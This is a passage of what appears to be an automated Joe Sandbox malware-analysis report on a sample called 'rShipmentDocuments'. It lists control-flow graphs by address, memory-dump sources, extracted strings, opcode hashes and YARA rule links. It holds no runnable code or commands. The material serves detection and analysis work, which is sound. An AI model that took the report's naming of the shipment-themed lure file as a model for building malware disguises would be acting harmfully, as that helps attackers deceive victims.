                                                      control_flow_graph 689 2a3cfaa-2a3cfd8 690 2a3cfda 689->690 691 2a3cfdf-2a3d0bc call 2a341a0 call 2a33cc0 689->691 690->691 701 2a3d0c3-2a3d0e4 call 2a35658 691->701 702 2a3d0be 691->702 704 2a3d0e9-2a3d0f4 701->704 702->701 705 2a3d0f6 704->705 706 2a3d0fb-2a3d0ff 704->706 705->706 707 2a3d101-2a3d102 706->707 708 2a3d104-2a3d10b 706->708 709 2a3d123-2a3d167 707->709 710 2a3d112-2a3d120 708->710 711 2a3d10d 708->711 715 2a3d1cd-2a3d1e4 709->715 710->709 711->710 717 2a3d1e6-2a3d20b 715->717 718 2a3d169-2a3d17f 715->718 725 2a3d223 717->725 726 2a3d20d-2a3d222 717->726 722 2a3d181-2a3d18d 718->722 723 2a3d1a9 718->723 727 2a3d197-2a3d19d 722->727 728 2a3d18f-2a3d195 722->728 724 2a3d1af-2a3d1cc 723->724 724->715 726->725 729 2a3d1a7 727->729 728->729 729->724
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 952a2de2d8d09cde92e4ca73538dfb2a268117538e1eec0d81eaa6229806075d
                                                      • Instruction ID: 46ff1b2c2a5a6f25bc8c152c0e8bc6cafdfa78bc30c357531129b5d75e97bb52
                                                      • Opcode Fuzzy Hash: 952a2de2d8d09cde92e4ca73538dfb2a268117538e1eec0d81eaa6229806075d
                                                      • Instruction Fuzzy Hash: 9B81B274E00618CFDB58DFAAD984A9DBBF2BF88300F14C069E419AB365DB349985CF10
                                                      Function 02A3A088 Relevance: 3.4, Strings: 2, Instructions: 890COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q$4'^q
                                                      • API String ID: 0-273632683
                                                      • Opcode ID: 79766bbb12b6081ee40a6d4742ad39b56edd2fe942dfb865be3bd92315fdd28e
                                                      • Instruction ID: df98e519de122583cdd5f457744a588353c8392297b83493db5394c643f8bccb
                                                      • Opcode Fuzzy Hash: 79766bbb12b6081ee40a6d4742ad39b56edd2fe942dfb865be3bd92315fdd28e
                                                      • Instruction Fuzzy Hash: C3826B31A00219DFCB16CFA8C984AAEBBF2FF88314F158559F4459B366DB31E991CB50
                                                      Function 02A369B0 Relevance: 3.1, Strings: 2, Instructions: 561COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2058 2a369b0-2a369e6 2059 2a36fb1-2a3700c call 2a37118 2058->2059 2060 2a369ec-2a369fa 2058->2060 2071 2a3700e-2a37012 2059->2071 2072 2a3705c-2a37060 2059->2072 2063 2a36a28-2a36a39 2060->2063 2064 2a369fc-2a36a0d 2060->2064 2065 2a36a3b-2a36a3f 2063->2065 2066 2a36aaa-2a36abe 2063->2066 2064->2063 2078 2a36a0f-2a36a1b 2064->2078 2068 2a36a41-2a36a4d 2065->2068 2069 2a36a5a-2a36a63 2065->2069 2201 2a36ac1 call 2a369a0 2066->2201 2202 2a36ac1 call 2a369b0 2066->2202 2076 2a36a53-2a36a55 2068->2076 2077 2a36ddb-2a36e26 2068->2077 2079 2a36a69-2a36a6c 2069->2079 2080 2a36d6c 2069->2080 2081 2a37021-2a37028 2071->2081 2082 2a37014-2a37019 2071->2082 2074 2a37062-2a37071 2072->2074 2075 2a37077-2a3708b 2072->2075 2073 2a36ac7-2a36acd 2085 2a36ad6-2a36add 2073->2085 2086 2a36acf-2a36ad1 2073->2086 2087 2a37073-2a37075 2074->2087 2088 2a3709d-2a370a7 2074->2088 2203 2a3708d call 2a39dd0 2075->2203 2204 2a3708d call 2a3a088 2075->2204 2205 2a3708d call 2a3a0e8 2075->2205 2089 2a36d62-2a36d69 2076->2089 2155 2a36e2d-2a36eac 2077->2155 2090 2a36d71-2a36dd4 2078->2090 2091 2a36a21-2a36a23 2078->2091 2079->2080 2092 2a36a72-2a36a91 2079->2092 2080->2090 2083 2a370fe-2a37113 2081->2083 2084 2a3702e-2a37035 2081->2084 2082->2081 2084->2072 2093 2a37037-2a3703b 2084->2093 2098 2a36ae3-2a36afa 2085->2098 2099 2a36bcb-2a36bdc 2085->2099 2086->2089 2094 2a37093-2a3709a 2087->2094 2095 2a370b1-2a370b5 2088->2095 2096 2a370a9-2a370af 2088->2096 2090->2077 2091->2089 2092->2080 2117 2a36a97-2a36a9d 2092->2117 2104 2a3704a-2a37051 2093->2104 2105 2a3703d-2a37042 2093->2105 2100 2a370bd-2a370f7 2095->2100 2102 2a370b7 2095->2102 2096->2100 2098->2099 2116 2a36b00-2a36b0c 2098->2116 2114 2a36c06-2a36c0c 2099->2114 2115 2a36bde-2a36beb 2099->2115 2100->2083 2102->2100 2104->2083 2107 2a37057-2a3705a 2104->2107 2105->2104 2107->2094 2119 2a36c27-2a36c2d 2114->2119 2120 2a36c0e-2a36c1a 2114->2120 2115->2119 2133 2a36bed-2a36bf9 2115->2133 2121 2a36b12-2a36b7e 2116->2121 2122 2a36bc4-2a36bc6 2116->2122 2117->2059 2124 2a36aa3-2a36aa7 2117->2124 2129 2a36c33-2a36c50 2119->2129 2130 2a36d5f 2119->2130 2127 2a36ec3-2a36f26 2120->2127 2128 2a36c20-2a36c22 2120->2128 2157 2a36b80-2a36baa 2121->2157 2158 2a36bac-2a36bc1 2121->2158 2122->2089 2124->2066 2180 2a36f2d-2a36fac 2127->2180 2128->2089 2129->2080 2147 2a36c56-2a36c59 2129->2147 2130->2089 2137 2a36eb1-2a36ebc 2133->2137 2138 2a36bff-2a36c01 2133->2138 2137->2127 2138->2089 2147->2059 2150 2a36c5f-2a36c85 2147->2150 2150->2130 2161 2a36c8b-2a36c97 2150->2161 2157->2158 2158->2122 2164 2a36d5b-2a36d5d 2161->2164 2165 2a36c9d-2a36d15 2161->2165 2164->2089 2183 2a36d43-2a36d58 2165->2183 2184 2a36d17-2a36d41 2165->2184 2183->2164 2184->2183 2201->2073 2202->2073 2203->2094 2204->2094 2205->2094
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q$Hbq
                                                      • API String ID: 0-662517225
                                                      • Opcode ID: 254b1ccc7b279b2cfaab3fff55d47cfb695fac117ff9251513a15010c0d5d904
                                                      • Instruction ID: f24b50cc70dcfa3e79d97d656ab8ffe772206d34791dd7214e39573ff921630d
                                                      • Opcode Fuzzy Hash: 254b1ccc7b279b2cfaab3fff55d47cfb695fac117ff9251513a15010c0d5d904
                                                      • Instruction Fuzzy Hash: 5B229D70A002199FCB15DF69C894BAEBBFABF88704F248469E815DB390DF349D41CB94
                                                      Function 068F9328 Relevance: 2.0, APIs: 1, Instructions: 528COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e95215d050e7d0f41eb0368b94d050f4c4e0f6533f6a6fcba45c581d87f8e0c3
                                                      • Instruction ID: 4b4e8005468d779a3c05e3e8026a4b90a5148bc69f416f670fa070af3e7021e6
                                                      • Opcode Fuzzy Hash: e95215d050e7d0f41eb0368b94d050f4c4e0f6533f6a6fcba45c581d87f8e0c3
                                                      • Instruction Fuzzy Hash: 57223570E10218CFDF64DFA9C884B9DBBB2BF88304F1085A9E519AB355DB349985CF91
                                                      Function 068F0B30 Relevance: .7, Instructions: 709COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d88814e3be409feab395fa6ea7e8bc865ad64908c763470df1317f3abf7f48f
                                                      • Instruction ID: a967c97056bcfaaab2517ef2ec6d29c2c27a94ec1715075a1a13655515b12619
                                                      • Opcode Fuzzy Hash: 6d88814e3be409feab395fa6ea7e8bc865ad64908c763470df1317f3abf7f48f
                                                      • Instruction Fuzzy Hash: 5572DD74E01228CFDBA4DF69C984BEDBBB2BB49304F1491E9E549A7255DB309E81CF40
                                                      Function 068FF3B8 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5fec321d6f4f25e020f9d961abcd26c0ab0e723f81f4328a0c7c7c19b23a26e6
                                                      • Instruction ID: e09d307f1a24a4873efc5b1346f8066bbde028a8a5cd65f54fe53b7444d1c615
                                                      • Opcode Fuzzy Hash: 5fec321d6f4f25e020f9d961abcd26c0ab0e723f81f4328a0c7c7c19b23a26e6
                                                      • Instruction Fuzzy Hash: CAC1B274E11218CFDB54DFA9C954B9DBBB2BF89300F2080A9D909AB354DB359E85CF50
                                                      Function 068F2970 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70446b76604ba89797cd79bb4bade4f577d0db1f1ec1ead4dcac04f654aa0cfd
                                                      • Instruction ID: 3db8a9546760f7bf7551cee2d5ba514cd2cf683c33d4dc152ccfa02a1137b1c4
                                                      • Opcode Fuzzy Hash: 70446b76604ba89797cd79bb4bade4f577d0db1f1ec1ead4dcac04f654aa0cfd
                                                      • Instruction Fuzzy Hash: 4AC1AE74E01218CFDB54DFA5D994B9DBBB2BF88304F2080A9D809AB364DB359E85CF50
                                                      Function 068F2DD0 Relevance: .2, Instructions: 220COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3d20cedd17989b0c9686b9725f6d5c63b5d1e2fbc44862c743c68818830db37c
                                                      • Instruction ID: df5268d9453363c3805ecf1702dbb619f7c82b6696f9cbdfb404a7c866db045a
                                                      • Opcode Fuzzy Hash: 3d20cedd17989b0c9686b9725f6d5c63b5d1e2fbc44862c743c68818830db37c
                                                      • Instruction Fuzzy Hash: 2EA10370D10208CFDB24DFA9C994B9DBBB1FF88314F209269E508AB3A1DB745A85CF51
                                                      Function 068F2DCA Relevance: .2, Instructions: 218COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd102f061f870f4e7d46b4f4a012fcd1dd046074895196b561bf97859f5868c9
                                                      • Instruction ID: 344fdb03b51253c89139dbf97c3c9da038ea154f78d8f2fa7ab666462d238c24
                                                      • Opcode Fuzzy Hash: bd102f061f870f4e7d46b4f4a012fcd1dd046074895196b561bf97859f5868c9
                                                      • Instruction Fuzzy Hash: 64A10370D10208CFDB14DFA9C994B9DBBB1FF89314F209269E509AB3A1DB749A85CF50
                                                      Function 068F3116 Relevance: .2, Instructions: 202COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 18d4e3173154d81e78bf5a618c7d05db2ad9470471bd2316f451017b31f7401a
                                                      • Instruction ID: 0cbe995f3e1cf588c4136078186441d2c67b07b3a216ff151962ef0c642ce459
                                                      • Opcode Fuzzy Hash: 18d4e3173154d81e78bf5a618c7d05db2ad9470471bd2316f451017b31f7401a
                                                      • Instruction Fuzzy Hash: AF911370D10218CFEB50DFA8C894BDCBBB1FF49314F209269E609AB291DB759A85CF54
                                                      Function 02A3E988 Relevance: .1, Instructions: 147COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76a1c54be5b5870dadda5ff19d7ec31ca23139187b44ced7bd366f85814e2e94
                                                      • Instruction ID: 2ac8720809c36b4977b3bb384e955fa82568de51c3fc17aa74965e0419b2ecac
                                                      • Opcode Fuzzy Hash: 76a1c54be5b5870dadda5ff19d7ec31ca23139187b44ced7bd366f85814e2e94
                                                      • Instruction Fuzzy Hash: 63519374E00208DFDB19DFAAD584A9DBBF2BF88310F248529E819BB364DB319945CF54
                                                      Function 02A3E97A Relevance: .1, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 028776c89e8160c6309cec676d04367d14247ed38fa162cd544d18856d97aaaa
                                                      • Instruction ID: f62f32295f7441a899fbb55c2cb3f57dd59348a1486912d7e3e4f498835f2a15
                                                      • Opcode Fuzzy Hash: 028776c89e8160c6309cec676d04367d14247ed38fa162cd544d18856d97aaaa
                                                      • Instruction Fuzzy Hash: 5951B374E00208DFDB19DFAAD984A9DBBB2FF88310F24C529E815AB364DB319845CF54
                                                      Function 02A376F1 Relevance: 10.5, Strings: 8, Instructions: 470COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 2a376f1-2a37725 1 2a37b54-2a37b58 0->1 2 2a3772b-2a3774e 0->2 3 2a37b71-2a37b7f 1->3 4 2a37b5a-2a37b6e 1->4 11 2a37754-2a37761 2->11 12 2a377fc-2a37800 2->12 9 2a37b81-2a37b96 3->9 10 2a37bf0-2a37c05 3->10 20 2a37b98-2a37b9b 9->20 21 2a37b9d-2a37baa 9->21 22 2a37c07-2a37c0a 10->22 23 2a37c0c-2a37c19 10->23 26 2a37763-2a3776e 11->26 27 2a37770 11->27 13 2a37802-2a37810 12->13 14 2a37848-2a37851 12->14 13->14 34 2a37812-2a3782d 13->34 17 2a37c67 14->17 18 2a37857-2a37861 14->18 35 2a37c6c-2a37c9c 17->35 18->1 24 2a37867-2a37870 18->24 28 2a37bac-2a37bed 20->28 21->28 29 2a37c1b-2a37c56 22->29 23->29 32 2a37872-2a37877 24->32 33 2a3787f-2a3788b 24->33 36 2a37772-2a37774 26->36 27->36 77 2a37c5d-2a37c64 29->77 32->33 33->35 40 2a37891-2a37897 33->40 59 2a3783b 34->59 60 2a3782f-2a37839 34->60 61 2a37cb5-2a37cbc 35->61 62 2a37c9e-2a37cb4 35->62 36->12 37 2a3777a-2a377dc 36->37 89 2a377e2-2a377f9 37->89 90 2a377de 37->90 43 2a37b3e-2a37b42 40->43 44 2a3789d-2a378ad 40->44 43->17 48 2a37b48-2a37b4e 43->48 57 2a378c1-2a378c3 44->57 58 2a378af-2a378bf 44->58 48->1 48->24 63 2a378c6-2a378cc 57->63 58->63 64 2a3783d-2a3783f 59->64 60->64 63->43 70 2a378d2-2a378e1 63->70 64->14 71 2a37841 64->71 72 2a378e7 70->72 73 2a3798f-2a379ba call 2a37538 * 2 70->73 71->14 75 2a378ea-2a378fb 72->75 91 2a379c0-2a379c4 73->91 92 2a37aa4-2a37abe 73->92 75->35 80 2a37901-2a37913 75->80 80->35 82 2a37919-2a37931 80->82 145 2a37933 call 2a380c9 82->145 146 2a37933 call 2a380d8 82->146 85 2a37939-2a37949 85->43 88 2a3794f-2a37952 85->88 93 2a37954-2a3795a 88->93 94 2a3795c-2a3795f 88->94 89->12 90->89 91->43 96 2a379ca-2a379ce 91->96 92->1 114 2a37ac4-2a37ac8 92->114 93->94 97 2a37965-2a37968 93->97 94->17 94->97 99 2a379d0-2a379dd 96->99 100 2a379f6-2a379fc 96->100 101 2a37970-2a37973 97->101 102 2a3796a-2a3796e 97->102 117 2a379df-2a379ea 99->117 118 2a379ec 99->118 103 2a37a37-2a37a3d 100->103 104 2a379fe-2a37a02 100->104 101->17 105 2a37979-2a3797d 101->105 102->101 102->105 107 2a37a49-2a37a4f 103->107 108 2a37a3f-2a37a43 103->108 104->103 106 2a37a04-2a37a0d 104->106 105->17 111 2a37983-2a37989 105->111 112 2a37a0f-2a37a14 106->112 113 2a37a1c-2a37a32 106->113 115 2a37a51-2a37a55 107->115 116 2a37a5b-2a37a5d 107->116 108->77 108->107 111->73 111->75 112->113 113->43 119 2a37b04-2a37b08 114->119 120 2a37aca-2a37ad4 call 2a363e0 114->120 115->43 115->116 121 2a37a92-2a37a94 116->121 122 2a37a5f-2a37a68 116->122 123 2a379ee-2a379f0 117->123 118->123 119->77 126 2a37b0e-2a37b12 119->126 120->119 134 2a37ad6-2a37aeb 120->134 121->43 124 2a37a9a-2a37aa1 121->124 129 2a37a77-2a37a8d 122->129 130 2a37a6a-2a37a6f 122->130 123->43 123->100 126->77 131 2a37b18-2a37b25 126->131 129->43 130->129 136 2a37b27-2a37b32 131->136 137 2a37b34 131->137 134->119 142 2a37aed-2a37b02 134->142 139 2a37b36-2a37b38 136->139 137->139 139->43 139->77 142->1 142->119 145->85 146->85
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                      • API String ID: 0-1932283790
                                                      • Opcode ID: 24897c45cab754d2c22b34652dfa4e2f939b538257b674cd9c55ba9b29236c19
                                                      • Instruction ID: 14ff931741d9b19b9a2694d5d93159348cba91e4eb33ffb57c7ce07acd78e78f
                                                      • Opcode Fuzzy Hash: 24897c45cab754d2c22b34652dfa4e2f939b538257b674cd9c55ba9b29236c19
                                                      • Instruction Fuzzy Hash: 2F122770A002099FCB16CF69D984AAEFBF2FF48314F158599F41A9B261DB30ED45CB50
                                                      Function 02A36498 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2206 2a36498-2a364a5 2207 2a364a7-2a364ab 2206->2207 2208 2a364ad-2a364af 2206->2208 2207->2208 2209 2a364b4-2a364bf 2207->2209 2210 2a366c0-2a366c7 2208->2210 2211 2a364c5-2a364cc 2209->2211 2212 2a366c8 2209->2212 2213 2a364d2-2a364e1 2211->2213 2214 2a36661-2a36667 2211->2214 2215 2a366cd-2a366e0 2212->2215 2213->2215 2216 2a364e7-2a364f6 2213->2216 2217 2a36669-2a3666b 2214->2217 2218 2a3666d-2a36671 2214->2218 2227 2a366e2-2a36705 2215->2227 2228 2a36718-2a3671a 2215->2228 2224 2a3650b-2a3650e 2216->2224 2225 2a364f8-2a364fb 2216->2225 2217->2210 2219 2a36673-2a36679 2218->2219 2220 2a366be 2218->2220 2219->2212 2221 2a3667b-2a3667e 2219->2221 2220->2210 2221->2212 2226 2a36680-2a36695 2221->2226 2229 2a3651a-2a36520 2224->2229 2231 2a36510-2a36513 2224->2231 2225->2229 2230 2a364fd-2a36500 2225->2230 2245 2a36697-2a3669d 2226->2245 2246 2a366b9-2a366bc 2226->2246 2247 2a36707-2a3670c 2227->2247 2248 2a3670e-2a36712 2227->2248 2232 2a3672f-2a36736 2228->2232 2233 2a3671c-2a3672e 2228->2233 2240 2a36522-2a36528 2229->2240 2241 2a36538-2a36555 2229->2241 2234 2a36601-2a36607 2230->2234 2235 2a36506 2230->2235 2236 2a36566-2a3656c 2231->2236 2237 2a36515 2231->2237 2252 2a36609-2a3660f 2234->2252 2253 2a3661f-2a36629 2234->2253 2242 2a3662c-2a36639 2235->2242 2243 2a36584-2a36596 2236->2243 2244 2a3656e-2a36574 2236->2244 2237->2242 2249 2a3652a 2240->2249 2250 2a3652c-2a36536 2240->2250 2277 2a3655e-2a36561 2241->2277 2270 2a3663b-2a3663f 2242->2270 2271 2a3664d-2a3664f 2242->2271 2272 2a365a6-2a365c9 2243->2272 2273 2a36598-2a365a4 2243->2273 2259 2a36576 2244->2259 2260 2a36578-2a36582 2244->2260 2254 2a366af-2a366b2 2245->2254 2255 2a3669f-2a366ad 2245->2255 2246->2210 2247->2228 2248->2228 2249->2241 2250->2241 2256 2a36613-2a3661d 2252->2256 2257 2a36611 2252->2257 2253->2242 2254->2212 2263 2a366b4-2a366b7 2254->2263 2255->2212 2255->2254 2256->2253 2257->2253 2259->2243 2260->2243 2263->2245 2263->2246 2270->2271 2274 2a36641-2a36645 2270->2274 2275 2a36653-2a36656 2271->2275 2272->2212 2283 2a365cf-2a365d2 2272->2283 2281 2a365f1-2a365ff 2273->2281 2274->2212 2278 2a3664b 2274->2278 2275->2212 2279 2a36658-2a3665b 2275->2279 2277->2242 2278->2275 2279->2213 2279->2214 2281->2242 2283->2212 2285 2a365d8-2a365ea 2283->2285 2285->2281
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,bq$,bq
                                                      • API String ID: 0-2699258169
                                                      • Opcode ID: a061cd003b03d53e5246b3adc94b4cd4beee814380d1a901c4fa4de2651b2af2
                                                      • Instruction ID: 749b55146fa5e156c2797a245d741e993def9a525d156a8ce2d2048e17520911
                                                      • Opcode Fuzzy Hash: a061cd003b03d53e5246b3adc94b4cd4beee814380d1a901c4fa4de2651b2af2
                                                      • Instruction Fuzzy Hash: F281D031B00505EFCB1ACF69C884A6ABBFAFF89A44B158169E405EB364DF31E841CB54
                                                      Function 02A35F5C Relevance: 2.7, Strings: 2, Instructions: 166COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2287 2a35f5c-2a35f60 2288 2a35f62-2a35f6e 2287->2288 2289 2a35f88-2a35f8f 2287->2289 2288->2289 2290 2a35f70-2a35f7b 2288->2290 2291 2a35f91-2a35f98 2289->2291 2292 2a35faf-2a35fb8 2289->2292 2293 2a36023-2a3604f 2290->2293 2294 2a35f81-2a35f83 2290->2294 2291->2292 2295 2a35f9a-2a35fa5 2291->2295 2372 2a35fba call 2a360a0 2292->2372 2373 2a35fba call 2a35f5c 2292->2373 2297 2a36056-2a36098 2293->2297 2296 2a3601b-2a36020 2294->2296 2295->2297 2298 2a35fab-2a35fad 2295->2298 2318 2a360cb-2a360cf 2297->2318 2319 2a3609a-2a360ae 2297->2319 2298->2296 2299 2a35fc0-2a35fc2 2301 2a35fc4-2a35fc8 2299->2301 2302 2a35fca-2a35fd2 2299->2302 2301->2302 2304 2a35fe5-2a35ff6 2301->2304 2305 2a35fe1-2a35fe3 2302->2305 2306 2a35fd4-2a35fd9 2302->2306 2370 2a35ff9 call 2a369a0 2304->2370 2371 2a35ff9 call 2a369b0 2304->2371 2305->2296 2306->2305 2308 2a35fff-2a36004 2310 2a36006-2a3600f 2308->2310 2311 2a36019 2308->2311 2374 2a36011 call 2a3aef0 2310->2374 2375 2a36011 call 2a3af00 2310->2375 2376 2a36011 call 2a3aeba 2310->2376 2377 2a36011 call 2a3afad 2310->2377 2311->2296 2314 2a36017 2314->2296 2320 2a36163-2a36165 2318->2320 2321 2a360d0-2a360d9 2318->2321 2324 2a360b0-2a360b6 2319->2324 2325 2a360bd-2a360cf 2319->2325 2378 2a36167 call 2a362f0 2320->2378 2379 2a36167 call 2a36300 2320->2379 2326 2a360db-2a360e7 2321->2326 2327 2a360e9-2a360f6 2321->2327 2324->2325 2325->2320 2332 2a360d5-2a360d9 2325->2332 2337 2a360f8-2a36102 2326->2337 2327->2337 2328 2a3616d-2a36173 2330 2a36175-2a3617b 2328->2330 2331 2a3617f-2a36186 2328->2331 2333 2a361e1-2a36240 2330->2333 2334 2a3617d 2330->2334 2332->2326 2332->2327 2350 2a36247-2a3625b 2333->2350 2334->2331 2340 2a36104-2a36113 2337->2340 2341 2a3612f-2a36133 2337->2341 2352 2a36123-2a3612d 2340->2352 2353 2a36115-2a3611c 2340->2353 2343 2a36135-2a3613b 2341->2343 2344 2a3613f-2a36143 2341->2344 2347 2a36189-2a361da 2343->2347 2348 2a3613d 2343->2348 2344->2331 2349 2a36145-2a36149 2344->2349 2347->2333 2348->2331 2349->2350 2351 2a3614f-2a36161 2349->2351 2351->2331 2352->2341 2353->2352 2370->2308 2371->2308 2372->2299 2373->2299 2374->2314 2375->2314 2376->2314 2377->2314 2378->2328 2379->2328
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hbq$Hbq
                                                      • API String ID: 0-4258043069
                                                      • Opcode ID: 720732296fd141e093dadf035c9caa5a59e142f5184e2b7f3c63ccdb8434ab80
                                                      • Instruction ID: cfb2e50b9d0a14c2ea152ce7627e2ac51ba195d66262f314c4ddb74382909956
                                                      • Opcode Fuzzy Hash: 720732296fd141e093dadf035c9caa5a59e142f5184e2b7f3c63ccdb8434ab80
                                                      • Instruction Fuzzy Hash: 6551BE35B04255EFDB169F24D894B6E7BBAFF89744F048829F8428B291DF39C811CB94
                                                      Function 02A39C30 Relevance: 2.6, Strings: 2, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: 6682393314bb0dd2d014361dac1d59c47e7f72dd2845e18449c8ab44a79d5f81
                                                      • Instruction ID: 5ca03bf981ddcfe4a20c527430fcdd40bccb03e9ee572217503c3e7d6b6b9b41
                                                      • Opcode Fuzzy Hash: 6682393314bb0dd2d014361dac1d59c47e7f72dd2845e18449c8ab44a79d5f81
                                                      • Instruction Fuzzy Hash: 6A519F317002069FDB06DF69D884B6BBBEAEB88350F048466F919CB355DBB5DC41CBA1
                                                      Function 02A33CC0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
